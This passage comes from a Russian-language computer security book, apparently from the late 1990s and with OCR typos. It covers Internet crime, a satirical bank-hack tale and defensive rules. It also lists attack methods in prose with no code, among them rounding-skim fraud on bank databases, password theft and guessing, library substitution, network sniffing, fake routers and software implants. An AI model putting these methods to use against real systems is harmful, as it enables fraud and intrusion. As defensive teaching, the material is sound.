  • Много компьютерных преступлений совершается в России с использованием возможностей, которые предоставляет своим пользователям сен. Internet.

Уникальность сети Internet заключается в том, что она не находится во владении какого-то физического лица, частной компании, государственного ведомства или отдельной страны. Поэтому практически во всех ее сегментах отсутствует централизованное регулирование, цензура и другие методы контроля информации. Благодаря этому открываются практически неограниченные возможности доступа к любой информации, которые используются преступниками. Сеть Internet можно рассматривать не только как инструмент совершения компьютерных преступлений, но и как среда для ведения разнообразной преступной деятельности.

При использовании сети Internet в качестве среды для преступной деятельности привлекательной для правонарушителей является сама возможность обмена информацией криминального характера. Применять в своей деятельности коммуникационные системы, обеспечивающие такую же оперативную и надежную связь по всему миру, раньше были в состоянии только спецслужбы сверхдержав — Америки и России, которые обладали необходимыми космическими технологиями.

Другая особенность сети Internet, которая привлекает преступников, — возможность осуществлять в глобальных масштабах информационно-психологическое воздействие на людей. Преступное сообщество весьма заинтересовано в распространении своих доктрин и учений, в формировании общественного мнения, благоприятного для укрепления позиций представителей преступного мира, и в дискредитации правоохранительных органов.

Однако наибольший интерес сеть Internet представляет именно как орудие для совершения преступлений (обычно в сфере экономики и финансов). В самом простом варианте эти преступления связаны с нарушением авторских прав. К такого рода преступлениям, в первую очередь, относится незаконное копирование и продажа программ, находящихся на серверах компаний, которые являются владельцами этих программ.

Во вторую группу преступлений можно включить нелегальное получение товаров и услуг, в частности, бесплатное пользование услугами, предоставляемыми за плату различными телефонными компаниями, за счет отличных знаний принципов функционирования и устройства современных автоматических телефонных станций. Другие способы незаконного пользования услугами основываются на модификации сведений о предоставлении этих услуг в базах данных компаний, которые их оказывают. Информация о предоставлении какой-то услуги в кредит может либо просто уничтожаться. либо изменяться для того, чтобы потребителем уже оплаченной кем-то услуги стал член преступного сообщества.

Наряду с нелегальным получением товаров и услуг интерес для преступных группировок представляют такие сферы мошеннической деятельности, как азартные игры (казино, лотереи и тотализаторы), организация финансовых пирамид, фиктивных брачных контор и фирм по оказанию мифических услуг. Во всех случаях оперативность взаимодействия с жертвами мошенничества и анонимность самого мошенника весьма привлекательны при совершении компьютерных преступлений в сети Internet.

Одна из предпосылок повышенного интереса, который преступники проявляют к сети Internet, заключается в том, что с развитием компьютерных сетей информация становится все более ценным товаром. Особенно это касается информации, имеющей отношение к банковской сфере — данные о вкладах и вкладчиках, финансовом положении банка и клиентов, кредитной и инвестиционной политике банка, а также о направлениях его развития. Поскольку в современных условиях субъекты кредитно-финансовой деятельности не могут существовать без взаимного информационного обмена, а также без общения со своими территориально удаленными филиалами и подразделениями, то часто для этих целей они используют Internet. А это значит, что у преступников появляется реальный шанс получить доступ к сугубо секретной информации о потенциальных объектах своей преступниц деятельности. Уничтожение такой информации преступниками является разновидностью недобросовестной конкуренции со стороны предприятий. которые находятся под "крышей" этих преступников. Даже одна угроза ее уничтожения может сама по себе послужить эффективным средством воздействия на руководство банка с целью вымогательства или шантажа.

Через Internet преступники стремятся также получить возможность нужным для себя образом модифицировать конфиденциальную служебную информацию, которая используется руководством банка для принятия каких-либо важных решений. Дело в том, что ввиду высокой трудоемкости оценки степени доверия к потенциальному получателю банковского кредита в большинстве банков промышленно-развитых стран эта операция автоматизирована. В секрете держатся не только исходные данные для принятия подобных решений, но и сами алгоритмы их выработки. Нетрудно догадаться, какими могут быть последствия, если такие алгоритмы знают посторонние лица, которые могут оказаться в состоянии модифицировать их так. чтобы они вырабатывали благоприятные для этих лиц решения.

Дополнительная сфера компьютерных преступлений, совершаемых через Internet, появилась с возникновением электронных банковских расчетов. т. е. с введением в обращение так называемой электронной наличности. Есть разные способы ее хищения, но все они основываются на модификации информации, отображающей электронную наличность. Информация о наличности, имеющейся на счетах клиентов, переписывается на счета, которыми безраздельно распоряжаются преступники. Изменения также могут быть внесены в сам алгоритм, определяющий правила функционирования системы обработки информации об электронных банковских расчетах. Например, меняется курс валют, чтобы для клиентов банка валюта пересчитывалась по заниженному курсу, а разница зачислялась на счета преступников.

Синдром Робина Гуда

В 1998 г. в Экспертно-криминалистическом центре МВД была проведена классификация компьютерных преступников. Обобщенный портрет отечественного хакера, созданный на основе этого анализа, выглядит примерно так:

  • мужчина в возрасте от 15 до 45 лет, имеющий многолетний опыт работы на компьютере либо почти не обладающий таким опытом;
  • в прошлом к уголовной ответственности не привлекался;
  • яркая мыслящая личность;
  • способен принимать ответственные решения;
  • хороший, добросовестный работник, по характеру нетерпимый к насмешкам и к потере своего социального статуса среди окружающих его людей;
  • любит уединенную работу;
  • приходит на службу первым и уходит последним; часто задерживается на работе после окончания рабочего дня и очень редко использует отпуск и отгулы.

По сведениям того же Экспертно-криминалистического центра МВД, принципиальная схема организации взлома защитных механизмов банковской информационной системы заключается в следующем. Профессиональные компьютерные взломщики обычно работают только после тщательной предварительной подготовки. Они снимают квартиру на подставное лицо в доме. в котором не проживают сотрудники спецслужб или городской телефонной сети. Подкупают сотрудников банка, знакомых с деталями электронных платежей и паролями, и работников телефонной станции, чтобы обезопаситься на случай поступления запроса от службы безопасности банка. Нанимают охрану из бывших сотрудников МВД. Чаше всего взлом банковской компьютерной сети осуществляется рано утром, когда дежурный службы безопасности теряет бдительность, а вызов помощи затруднен.

Компьютерные преступления парадоксальны тем, что в настоящее время трудно найти другой вид преступления, после совершения которою его жертва не выказывает заинтересованности в поимке преступника, а сам преступник, будучи пойман, рекламирует свою деятельность на поприще компьютерного взлома, мало что утаивая от представителей правоохранительных органов. Этот парадокс вполне объясним:

  • жертва компьютерного преступления совершенно убеждена, что затраты па его раскрытие (включая потери, понесенные в результате утраты банком своей репутации) существенно превосходят уже причиненный ущерб; Глава 1. Угрозы компьютерной безопасности
  • Преступник, даже получив максимальный срок тюремною наказа очень большой, а если повезет, то условный или сокращенный), приобретет широкую известность в деловых и криминальных кругах, что в дальнейшем позволит ему с выгодой использовать полученные знания.

Таким образом, для общественного мнения в России характерен "синдром Робина Гуда" — преступники-хакеры представляются некими благородным;; борцами против толстосумов-банкиров. А посему хакерство в России, по видимому, просто обречено на дальнейшее развитие.

Суммируя информацию о компьютерных взломах, которая время от времени появляется в отечественной прессе, можно привести следующее обобщенное (так сказать, "среднеарифметическое") описание одного такого взлома. И если в этом описании кто-то увидит определенные преувеличения пли несуразности, то их следует отнести на счет воспаленного воображения некоторых российских журналистов, явно страдающих "синдромом Робина Гуда" в особо тяжелой форме.

История одного компьютерного взлома

В назначенный день около восьми часов вечера все участники планировавшегося взлома компьютерной защиты одного из банков собрались в довольно просторной московской квартире, которая за 3 месяца до начала операции была снята на подставное имя в неприметном доме на тихой улице. Дом был выбран отнюдь не случайно: они выяснили, что в этом ломе не проживают сотрудники правоохранительных органов, спецслужб, налоговой полиции и городских телефонных станций, дипломаты, депутаты, террористы, киберпанки и резиденты иностранных разведок.

Одновременно со взломщиками на "боевое" дежурство заступили подкупленный служащий местной телефонной станции, который на запрос об определении номера телефона квартиры, откуда осуществлялся взлом, должен был сообщить "липовый" номер телефона, и высокопоставленный агент в российских ракетно-космических войсках, который в случае неудачного взлома пообещал организовать нанесение ракетного удара для уничтожения банка, телефонной станции и штаб-квартиры взломщиков с целью замести следы преступления.

У подъезда дома стоял ничем не примечательный шестисотый "Мерседес", в котором сидели два представителя заказчика— крупной московской бандитской группировки. Один банк "кинул" дружественную группировке коммерческую фирму на очень большую сумму. Этот банк было решено наказать, запустив в его компьютерную сеть зловредный вирус, который должен был минимум на сутки вывести из строя все банковские коммуникации, включая электрическую, газовую, водопроводную и канализационную ее и,. а также мусоропровод.

Главарь банды взломщиков провел инструктаж о бережном обращении с казенным имуществом, раздал компьютеры, бронежилеты, рации и сообщил позывные.

Временная штаб-квартира взломщиков была оснащена по последнем} слову техники. На телефонную линию установлено устройство для противодействия подслушиванию. Окна и двери залиты эпоксидной смолой, чтобы не подглядывали соседи. Вся аппаратура подключена к мощным аккумуляторам, чтобы случайные перебои в электропитании не смогли помешать взлому. А сами компьютеры густо посыпаны средством против тараканов и мышей, чтобы исключить непредвиденные сбои в работе оборудования.

Подготовительный этап операции, основная задача которого состояла в подборе входных паролей, начался в 9 часов вечера и продолжался вею ночь, пока в 6 часов утра в штаб-квартире не раздался телефонный звонок. Звонил подкупленный работник банка, который сообщил пароли для входа в банковскую компьютерную сеть.

Главарь приказал по рации всем участникам операции приготовиться к проведению ее заключительной фазы. "Первый готов, второй готов, третий готов" — понеслось в ответ. "Поехали!" — послышалась команда главаря. По этой команде дюжие охранники окружили дом: им было приказано никого не впускать и не выпускать без письменного разрешения с подписью главаря, заверенной нотариусом.

Семь смертоносных программ-вирусоносителей устремились по телефонным линиям в атаку на главный сервер банка. Банковские программы защиты были сначала парализованы, а потом полностью смяты превосходящими силами противника. Вырвавшиеся на оперативный простор вирусы учинили в компьютерной сети банка настоящий дебош.

Получив сигнал о проникновении вирусов, главный сервер компьютерной сети банка отключил все коммуникации. В результате город остался без тепла, воды и электричества.

Пока поднятые по тревоге сотрудники отдела безопасности банка торговались, сколько им заплатят за срочность, а потом вылавливали расплодившиеся вирусы, прошли почти сутки. За это время в московской квартире, в которой осуществлялся взлом, были уничтожены все следы пребывания компьютерных взломщиков.

Прямой ущерб, понесенный банком из-за не прохождения платежей, составил сотни тысяч долларов. А заказчикам взлом компьютерной зашиты банка обошелся всего в 20 тыс. фальшивых долларов.

В заключение можно заметить, что зарубежным банкирам еще повезло, что операция прошла успешно, и для заметания следов совершенною преступления компьютерным взломщикам не пришлось воспользоваться услугами своего агента в ракетно-космических войсках.

 

2. Компьютер глазами хакера

Компьютер глазами хакера

В деловом мире наконец-то признали важность решения проблемы защиты компьютерных данных. Громкие процессы, связанные с проникновением злоумышленников в корпоративные компьютерные системы, особенно дели Левина, названное Интерполом самым серьезным транснациональным сетевым компьютерным преступлением, в результате которого американский Сити-банк потерял 400 тыс. долларов, привлекли пристальное внимание не только специалистов в области компьютерной обработки данных, но и директоров компаний. Последние пусть с опозданием, но все-таки поняли. что с пуском в эксплуатацию каждой новой компьютерной системы, имеющей выход в глобальную компьютерную сеть Internet, они рискуют распахнуть перед злоумышленниками всех мастей (профессиональными взломщиками и грабителями, обиженными подчиненными или ничем не брезгующими конкурентами) окно, через которое те могут беспрепятственно проникать в святая святых компании и наносить существенный материальный ущерб. В результате как неосведомленность руководителей, так и бюджетные ограничения теперь не являются основными препятствиями на пути внедрения мер защиты информации в компьютерных системах, а главную роль играет выбор конкретных инструментов и решений.

Выяснилось, что создание хорошо защищенной компьютерной системы невозможно без тщательного анализа потенциальных угроз для ее безопасности. Специалисты составили перечень действий, которые нужно произвести в каждом конкретном случае, чтобы представлять сценарии возможных нападений на компьютерную систему. Этот перечень включал:

  • определение ценности информации, хранимой в компьютерной системе:
  • оценку временных и финансовых затрат, которые может позволить себе злоумышленник для преодоления механизмов зашиты компьютерной системы;
  • вероятную модель поведения злоумышленника при атаке на компьютерную систему;
  • оценку временных и финансовых затрат, необходимых для организации адекватной защиты компьютерной системы.

Таким образом, при проведении анализа потенциальных угроз безопасности компьютерной системы эксперт ставил себя на место злоумышленника, пытающегося проникнуть в эту систему. А для этого ему необходимо было понять, что представляет собой злоумышленник, от которого требуется защищаться. И в первую очередь нужно было как можно точнее ответить на следующие вопросы:

  • насколько высок уровень профессиональной подготовки злоумышленника;
  • какой информацией об атакуемой компьютерной системе он владеет;
  • как злоумышленник осуществляет доступ к этой системе;
  • каким способом атаки он воспользуется с наибольшей вероятностью.

Однако экспертам, которым приходилось ставить себя на место злоумышленника, чтобы ответить на перечисленные выше вопросы, очень не понравилось именоваться злоумышленниками. Во-первых, это слово — длинное и неуклюжее, а во-вторых, оно не совсем адекватно отражает суть решаемой задачи, которая состоит не в нахождении брешей в защите компьютерной системы, а в их ликвидации. Поэтому они взяли на вооружение другой термин, который более точно соответствует возложенной на них миссии, и стали разрабатывать сценарии поведения так называемых хакеров.

3. Кто такие хакеры

Кто такие хакеры

Хотя последнее время термин хакер можно довольно часто встретить на страницах компьютерной прессы, у пользующихся им людей до сих пор не сложилось единого мнения о том, кого именно следует именовать хакером. Часто хакером называют любого высококлассного специалиста в области вычислительной техники и всего, что с ней связано. Однако среди журналистов, затрагивающих тему хакерства, имеются серьезные разногласия относительно того, как хакеры применяют свои уникальные познания на практике.

Одни предлагают называть хакером лишь того, кто пытается взломать защиту компьютерных систем, чтобы затем выдать обоснованные рекомендации по улучшению их защитных механизмов, другие — именовать хакером высококвалифицированного специалиста, который взламывает компьютеры исключительно в преступных целях. Чтобы не ввязываться в полемику, которая в основном касается нравственно-этической стороны деятельности хакеров, для начала назовем хакером любого человека, стремящегося обойти защиту компьютерной системы, вне зависимости от того, преследуются ли по закону его действия. При этом основной целью хакера является получение дополнительных привилегий и прав доступа к компьютерной системе. По отношению к атакуемой им компьютерной системе хакер может быть:

  • посторонним лицом, не имеющим никаких легальных привилегий и прав доступа;
  • пользователем компьютерной системы, обладающим ограниченными привилегиями и правами доступа.

Статистика компьютерных преступлений свидетельствует о том. что уровень профессиональной подготовки хакера варьируется в очень широких пределах. Хакером может стать даже школьник, случайно обнаруживший программу взлома на одном из специализированных хакерских серверов и сети Internet. В то же время отмечено и появление настоящих хакерских банд. главарями которых являются компьютерные специалисты высочайшей квалификации.

В дальнейшем под хакером будет пониматься только высоко квалифицированный специалист, поскольку именно его действия представляют наибольшую угрозу безопасности компьютерных систем. Для такого хакера характерны следующие черты и особенности поведения:

  • он всегда в курсе последних новинок в области компьютерной техники устройств связи и программных средств;
  • перед тем как атаковать компьютерную систему, он всеми доступными способами пытается собрать максимум информации об этой системе, включая данные об используемом в ней программном обеспечении и ее администраторах;
  • добывая нужную ему информацию, он не брезгует агентурными и оперативно-техническими методами (например, устанавливая подслушивающие устройства в местах, часто посещаемых обслуживающим персоналом компьютерных систем, которые он намеревается взломать);
  • перед попыткой взлома компьютерной системы он опробует методы, которые планирует применить для атаки на эту систему, на заранее подготовленной модели, имеющей те же средства обеспечения безопасности, что и атакуемая система;
  • сама атака компьютерной системы осуществляется по возможности быстро, чтобы ее администраторы не смогли зафиксировать факт совершения атаки и не успели предпринять меры для отражения атаки и для выявления личности и местонахождения атакующего;
  • хакер не пользуется слишком изощренными методами взлома запиты компьютерной системы, поскольку чем сложнее алгоритм атаки, тем вероятнее возникновение ошибок и сбоев при его реализации;
  • чтобы минимизировать время, необходимое для взлома, и количество возможных ошибок, хакер обычно атакует компьютерную систему при помощи заранее написанных программ, а не вручную, набирая необходимые команды на клавиатуре компьютера;
  • хакер никогда не действует под собственным именем и тщательно скрывает свой сетевой адрес, а на всякий случай у него имеется тщательно продуманный план замести следы или оставить ложный след (например. одновременно ведя неумелую и заведомо обреченную на провал атаку, благодаря чему журнал аудита атакуемой компьютерной системы оказывается забит до отказа сообщениями о событиях, затрудняющих для системного администратора выяснение характера действительной атаки и принятие мер, чтобы не допустить ее в будущем);
  • хакеры широко применяют программные закладки, которые самоуничтожаются либо при их обнаружении, либо по истечении фиксированною периода времени.

4. Методы взлома компьютерных систем

 

В общем случае программное обеспечение любой универсальной компьютерной системы состоит из трех основных компонентов: операционной системы, сетевого программного обеспечения (СПО) и системы управления базами данных (СУБД). Поэтому все попытки взлома защиты компьютерных систем можно разделить на три группы:

  • атаки на уровне операционной системы;
  • атаки на уровне сетевого программного обеспечения;
  • атаки на уровне систем управления базами данных.

Атаки на уровне систем управления базами данных

Защита СУБД является одной из самых простых задач. Это связано с тем, что СУБД имеют строго определенную внутреннюю структуру, и операции над элементами СУБД заданы довольно четко. Есть четыре основных действия — поиск, вставка, удаление и замена элемента. Другие операции являются вспомогательными и применяются достаточно редко. Наличие строгой структуры и четко определенных операций упрощает решение задачи защиты СУБД. В большинстве случаев хакеры предпочитают взламывать защиту компьютерной системы на уровне операционной системы и получать доступ к файлам СУБД с помощью средств операционной системы. Однако в случае, если используется СУБД, не имеющая достаточно надежных защитных механизмов, или плохо протестированная версия СУБД, содержащая ошибки, или если при определении политики безопасности администратором СУБД были допущены ошибки, то становится вполне вероятным преодоление хакером защиты, реализуемой на уровне СУБД.

Кроме того, имеются два специфических сценария атаки на СУБД, для защиты от которых требуется применять специальные методы. В первом случае результаты арифметических операций над числовыми полями СУБД округляются в меньшую сторону, а разница суммируется в некоторой другой записи СУБД (как правило, эта запись содержит личный счет хакера в банке, а округляемые числовые поля относятся к счетам других клиентов банка). Во втором случае хакер получает доступ к полям записей СУБД, для которых доступной является только статистическая информация. Идея хакерской атаки на СУБД — так хитро сформулировать запрос, чтобы множество записей, для которого собирается статистика, состояло только из одной записи.

Атаки на уровне операционной системы

Защищать операционную систему, в отличие от СУБД, гораздо сложнее. Дело в том, что внутренняя структура современных операционных систем чрезвычайно сложна, и поэтому соблюдение адекватной политики безопасности является значительно более трудной задачей. Среди людей несведующих бытует мнение, что самые эффективные атаки на операционные cистемы могут быть организованы только с помощью сложнейших средств, основанных на самых последних достижениях науки и техники, а хакер должен быть программистом высочайшей квалификации. Это не совсем так.

Никто не спорит с тем, что пользователю следует быть в курсе всех новинок в области компьютерной техники. Да и высокая квалификация — совсем не лишнее. Однако искусство хакера состоит отнюдь не в том, чтобы взламывать любую самую "крутую" компьютерную защиту. Нужно просто суметь найти слабое место в конкретной системе защиты. При этом простейшие методы взлома оказываются ничуть не хуже самых изощренных, поскольку чем проще алгоритм атаки, тем больше вероятность ее завершения без ошибок и сбоев, особенно если возможности предварительного тестирования этого алгоритма в условиях, приближенных к "боевым", весьма ограничены

Успех реализации того или иного алгоритма хакерской атаки на практике в значительной степени зависит от архитектуры и конфигурации конкретной операционной системы, являющейся объектом этой атаки. Однако имеются атаки, которым может быть подвергнута практически любая операционная система:

  • кража пароля;
  • подглядывание за пользователем, когда тот вводит пароль, дающий право на работу с операционной системой (даже если во время ввода пароль не высвечивается на экране дисплея, хакер может легко у шип, пароль, просто следя за перемещением пальцев пользователя по клавиатуре);
  • получение пароля из файла, в котором этот пароль был сохранен пользователем, не желающим затруднять себя вводом пароля при подключении к сети (как правило, такой пароль хранится в файле в незашифрованном виде);
  • поиск пароля, который пользователи, чтобы не забыть, записывают па календарях, в записных книжках или на оборотной стороне компьютерных клавиатур (особенно часто подобная ситуация встречается, если администраторы заставляют пользователей применять трудно запоминаемые пароли);
  • кража внешнего носителя парольной информации (дискеты или электронного ключа, на которых хранится пароль пользователя, предназначенный для входа в операционную систему);
  • полный перебор всех возможных вариантов пароля;
  • подбор пароля по частоте встречаемости символов и биграмм, с помощью словарей наиболее часто применяемых паролей, с привлечением знаний о конкретном пользователе — его имени, фамилии, номера телефона, даты рождения и т. д., с использованием сведений о существовании эквивалентных паролей, при этом из каждого класса опробуется всего один пароль, что может значительно сократить время перебора;
  • сканирование жестких дисков компьютера (хакер последовательно пытается обратиться к каждому файлу, хранимому на жестких дисках компьютерной системы; если объем дискового пространства достаточно велик, можно быть вполне уверенным, что при описании доступа к файлам и каталогам администратор допустил хотя бы одну ошибку, в результате чего все такие каталоги и файлы будут прочитаны хакером; для сокрытия следов хакер может организовать эту атаку под чужим именем: например, под именем пользователя, пароль которого известен хакеру);
  • сборка "мусора" (если средства операционной системы позволяют восстанавливать ранее удаленные объекты, хакер может воспользоваться этой возможностью, чтобы получить доступ к объектам, удаленным другими пользователями: например, просмотрев содержимое их "мусорных" корзин);
  • превышение полномочий (используя ошибки в программном обеспечении или в администрировании операционной системы, хакер получает полномочия, превышающие полномочия, предоставленные ему согласно действующей политике безопасности);
  • запуск программы от имени пользователя, имеющего необходимые полномочия, или в качестве системной программы (драйвера, сервиса, демона и т. д.);
  • подмена динамически загружаемой библиотеки, используемой системными программами, или изменение переменных среды, описывающих путь к таким библиотекам;
  • модификация кода или данных подсистемы защиты самой операционной системы;
  • отказ в обслуживании (целью этой атаки является частичный или полный вывод из строя операционной системы);
  • захват ресурсов (хакерская программа производит захват всех имеющихся в операционной системе ресурсов, а затем входит в бесконечный цикл);
  • бомбардировка запросами (хакерская программа постоянно направляет операционной системе запросы, реакция на которые требует привлечения значительных ресурсов компьютера);
  • использование ошибок в программном обеспечении или администрировании.

Если в программном обеспечении компьютерной системы нет ошибок и ее администратор строго соблюдает политику безопасности, рекомендованную разработчиками операционной системы, то атаки всех перечисленных пики, малоэффективны. Дополнительные меры, которые должны быть предприняты для повышения уровня безопасности, в значительной степени зависят от конкретной операционной системы, под управлением которой работаем данная компьютерная система. Тем не менее, приходится признать, что вне зависимости от предпринятых мер полностью устранить угрозу взлома компьютерной системы на уровне операционной системы невозможно. Поэтому политика обеспечения безопасности должна проводиться так, чтобы, даже преодолев защиту, создаваемую средствами операционной системы, хакер не смог нанести серьезного ущерба.

Атаки на уровне сетевого программного обеспечения

СПО является наиболее уязвимым, потому что канал связи, по которому передаются сообщения, чаше всего не защищен, и всякий, кто может иметь доступ к этому каналу, соответственно, может перехватывать сообщения и отправлять свои собственные. Поэтому на уровне СПО возможны следующие хакерские атаки:

  • прослушивание сегмента локальной сети (в пределах одного и того же сегмента локальной сети любой подключенный к нему компьютер в состоянии принимать сообщения, адресованные другим компьютерам сегмента, а следовательно, если компьютер хакера подсоединен к некоторому сегменту локальной сети, то ему становится доступен весь информационный обмен между компьютерами этого сегмента);
  • перехват сообщений на маршрутизаторе (если хакер имеет привилегированный доступ к сетевому маршрутизатору, то он получает возможность перехватывать все сообщения, проходящие через этот маршрутизатор, и хотя тотальный перехват невозможен из-за слишком большого объема, чрезвычайно привлекательным для хакера является выборочный перехват сообщений, содержащих пароли пользователей и их электронную почту);
  • создание ложного маршрутизатора (путем отправки в сеть сообщений специального вида хакер добивается, чтобы его компьютер стал маршрутизатором сети, после чего получает доступ ко всем проходящим через него сообщениям);
  • навязывание сообщений (отправляя в сеть сообщения с ложным обратным сетевым адресом, хакер переключает на свой компьютер уже установленные сетевые соединения и в результате получает права пользователей, чьи соединения обманным путем были переключены на компьютер хакера);
  • отказ в обслуживании (хакер отправляет в сеть сообщения специальною вида, после чего одна или несколько компьютерных систем, подключенных к сети, полностью или частично выходят из строя).

Поскольку хакерские атаки на уровне СПО спровоцированы открытостью сетевых соединений, разумно предположить, что дли отражения этих атак необходимо максимально защитить каналы связи и тем самым затруднить обмен информацией по сети для тех, кто не является легальным пользователем. Ниже перечислены некоторые способы такой защиты:

  • максимальное ограничение размеров компьютерной сети (чем больше сеть, тем труднее ее защитить);
  • изоляция сети от внешнего мира (по возможности следует ограничивать физический доступ к компьютерной сети извне, чтобы уменьшить вероятность несанкционированного подключения хакера);
  • шифрование сетевых сообщений (тем самым можно устранить угрозу перехвата сообщений, правда, за счет снижения производительности СПО и роста накладных расходов);
  • электронная цифровая подпись сетевых сообщений (если все сообщения, передаваемые по компьютерной сети, снабжаются электронной цифровой подписью, и при этом неподписанные сообщения игнорируются, то можно забыть про угрозу навязывания сообщений и про большинство угроз, связанных с отказом в обслуживании);
  • использование брандмауэров (брандмауэр является вспомогательным средством защиты, применяемым только в том случае, если компьютерную сеть нельзя изолировать от других сетей, поскольку брандмауэр довольно часто не способен отличить потенциально опасное сетевое сообщение от совершенно безвредного, и в результате типичной является ситуация, когда брандмауэр не только не защищает сеть от хакерских атак, но и даже препятствует ее нормальному функционированию).

5. Защита системы от взлома

 

Защита системы от взлома

Перечисленные выше методы хакерской атаки на компьютерную систему являются наиболее типичными и описаны в общей форме. Самые распространенные из этих методов будут рассмотрены ниже более подробно, поскольку их применение в конкретных случаях имеет свои особенности, которые требуют применения дополнительных защитных мер. А пока для обобщенной модели взлома компьютерных систем можно сформулировать универсальные правила, которых следует придерживаться, чтобы свести риск к минимуму.

  • Не отставайте от хакеров: будьте всегда в курсе последних разработок из области компьютерной безопасности. Оформите подписку на несколько специализированных журналов, в которых подробно освещаются вопросы зашиты компьютерных систем от взлома. Регулярно просматривал материалы, помещаемые на хакерских серверах Internet (например. astalavista.box.sk).
  • Руководствуйтесь принципом разумной достаточности: не стремитесь построить абсолютно надежную защиту. Ведь чем мощнее зашита, тем больше ресурсов компьютерной системы она потребляет и тем труднее использовать ее.
  • Храните в секрете информацию о принципах действия защитных механизмов компьютерной системы. Чем меньше хакеру известно об этих принципах, тем труднее будет для него организовать успешную атаку.
  •  
  • Постарайтесь максимально ограничить размеры защищаемой компьютерной сети и без крайней необходимости не допускайте ее подключения к Internet.

  • Перед тем как вложить денежные средства в покупку нового программного обеспечения, поищите информацию о нем, имеющуюся на хакерских серверах Internet.
  • Размещайте серверы в охраняемых помещениях. Не подключайте к ним клавиатуру и дисплеи, чтобы доступ к этим серверам осуществлялся только через сеть.
  • Абсолютно все сообщения, передаваемые по незащищенным каналам связи, должны шифроваться и снабжаться цифровой подписью.
  • Если защищаемая компьютерная сеть имеет соединение с незащищенной сетью, то все сообщения, отправляемые в эту сеть или принимаемые из нее, должны проходить через брандмауэр, а также шифроваться и снабжаться цифровой подписью.
  • Не пренебрегайте возможностями, которые предоставляет аудит. Интервал между сеансами просмотра журнала аудита не должен превышать одних суток.
  • Если окажется, что количество событий, помешенных в журнал аудита, необычайно велико, изучите внимательно все новые записи. поскольку не исключено, что компьютерная система подверглась атаке хакера, который пытается замести следы своего нападения, зафиксированные в журнале аудита.
  • Регулярно производите проверку целостности программного обеспечения компьютерной системы. Проверяйте ее на наличие программных закладок.
  • Регистрируйте все изменения политики безопасности в обычном бумажном журнале. Регулярно сверяйте политику безопасности с зарегистрированной в этом журнале. Это поможет обнаружить присутствие программной закладки, если она была внедрена хакером в компьютерную систему.
  • Пользуйтесь защищенными операционными системами.
  • Создайте несколько ловушек для хакеров (например, заведите на диске файл с заманчивым именем, прочитать который невозможно с помощью обычных средств, и если будет зафиксировано успешное обращение к этому файлу, значит в защищаемую компьютерную систему была внедрена программная закладка).
  • Регулярно тестируйте компьютерную систему с помощью специальных программ, предназначенных для определения степени ее защищенности от хакерских атак.
 

Глава 2. Программы-шпионы

Глава 2. Программы-шпионы

1. Программные закладки

 

Программные закладки

Современная концепция создания компьютерных систем предполагает использование программных средств различного назначения в едином комплексе. К примеру, типовая система автоматизированного документооборота состоит из операционной среды, программных средств управления базами данных, телекоммуникационных программ, текстовых редакторов, антивирусных мониторов, средств для криптографической защиты данных, а также средств аутентификации и идентификации пользователей. Главным условием правильного функционирования такой компьютерной системы является обеспечение защиты от вмешательства в процесс обработки информации тех программ, присутствие которых в компьютерной системе не обязательно. Среди подобных программ, в первую очередь, следует упомянуть компьютерные вирусы. Однако имеются вредоносные программы еще одного класса. От них, как и от вирусов, следует с особой тщательностью очищать свои компьютерные системы. Это так называемые программные закладки, которые могут выполнять хотя бы одно из перечисленных ниже действий:

  • вносить произвольные искажения в коды программ, находящихся и оперативной памяти компьютера (программная закладка первого типа);
  • переносить фрагменты информации из одних областей оперативной или внешней памяти компьютера в другие (программная закладка второго типа);
  • искажать выводимую на внешние компьютерные устройства или в канал связи информацию, полученную в результате работы других программ (программная закладка третьего типа).

Программные закладки можно классифицировать и по методу их внедрения в компьютерную систему:

  • программно-аппаратные закладки, ассоциированные с аппаратными средствами компьютера (их средой обитания, как правило, является BIOS — набор программ, записанных в виде машинного кода в постоянном запоминающем устройстве — ПЗУ);
  • загрузочные закладки, ассоциированные с программами начальной загрузки, которые располагаются в загрузочных секторах (из этих секторов в процессе выполнения начальной загрузки компьютер считывает программу, берущую на себя управление для последующей загрузки самой операционной системы);
  • драйверные закладки, ассоциированные с драйверами (файлами, и которых содержится информация, необходимая операционной системе для управления подключенными к компьютеру периферийными устройствами);
  • прикладные закладки, ассоциированные с прикладным программным обеспечением общего назначения (текстовые редакторы, утилиты, антивирусные мониторы и программные оболочки);
  • исполняемые закладки, ассоциированные с исполняемыми программными модулями, содержащими код этой закладки (чаше всего эти модули представляют собой пакетные файлы, т. е. файлы, которые состоят из команд операционной системы, выполняемых одна за одной, как если бы их набирали на клавиатуре компьютера);
  • закладки-имитаторы, интерфейс которых совпадает с интерфейсом некоторых служебных программ, требующих ввод конфиденциальной информации (паролей, криптографических ключей, номеров кредитных карточек);
  • замаскированные закладки, которые маскируются под программные средства оптимизации работы компьютера (файловые архиваторы, дисковые дефрагментаторы) или под программы игрового и развлекательного назначения.

Чтобы программная закладка могла произвести какие-либо действия по отношению к другим программам или по отношению к данным, процессор должен приступить к исполнению команд, входящих в состав кода программной закладки. Это возможно только при одновременном соблюдении следующих условий:

  • программная закладка должна попасть в оперативную память компьютера (если закладка относится к первому типу, то она должна быть загружена до начала работы другой программы, которая является целью воздействия закладки, или во время работы этой программы);
  • работа закладки, находящейся в оперативной памяти, начинается при выполнении ряда условий, которые называются активизирующими.

Интересно, что иногда сам пользователь провоцируется на запуск исполняемого файла, содержащего код программной закладки. Известен такой случай. Среди пользователей свободно распространялся набор из архивированных файлов. Для извлечения файлов из него требовалось вызвать специальную утилиту, которая, как правило, есть почти у каждого пользователя и запускается после указания ее имени в командной строке. Однако мало кто из пользователей замечал, что в полученном наборе файлов уже имелась программа с таким же именем и .что запускаюсь именно она. Кроме разархивирования файлов, эта программная закладка дополнительно производила ряд действий негативного характера.

С учетом замечания о том, что программная закладка должна быть обязательно загружена в оперативную память компьютера, можно выделить резидентные закладки (они находятся в оперативной памяти постоянно, начиная с некоторого момента и до окончания сеанса работы компьютера, т. с. до его перезагрузки или до выключения питания) и нерезидентные (такие закладки попадают в оперативную память компьютера аналогично резидентным, однако, в отличие от последних, выгружаются по истечении некоторого времени или при выполнении особых условий).

Существуют три основные группы деструктивных действий, которые могут осуществляться программными закладками:

  • копирование информации пользователя компьютерной системы (паролей, криптографических ключей, кодов доступа, конфиденциальных электронных документов), находящейся в оперативной или внешней памяти этой системы либо в памяти другой компьютерной системы, подключенной к ней через локальную или глобальную компьютерную сеть;
  • изменение алгоритмов функционирования системных, прикладных м служебных программ (например, внесение изменений в программу разграничения доступа может привести к тому, что она разрешит вход в систему всем без исключения пользователям вне зависимости от правильности введенного пароля);
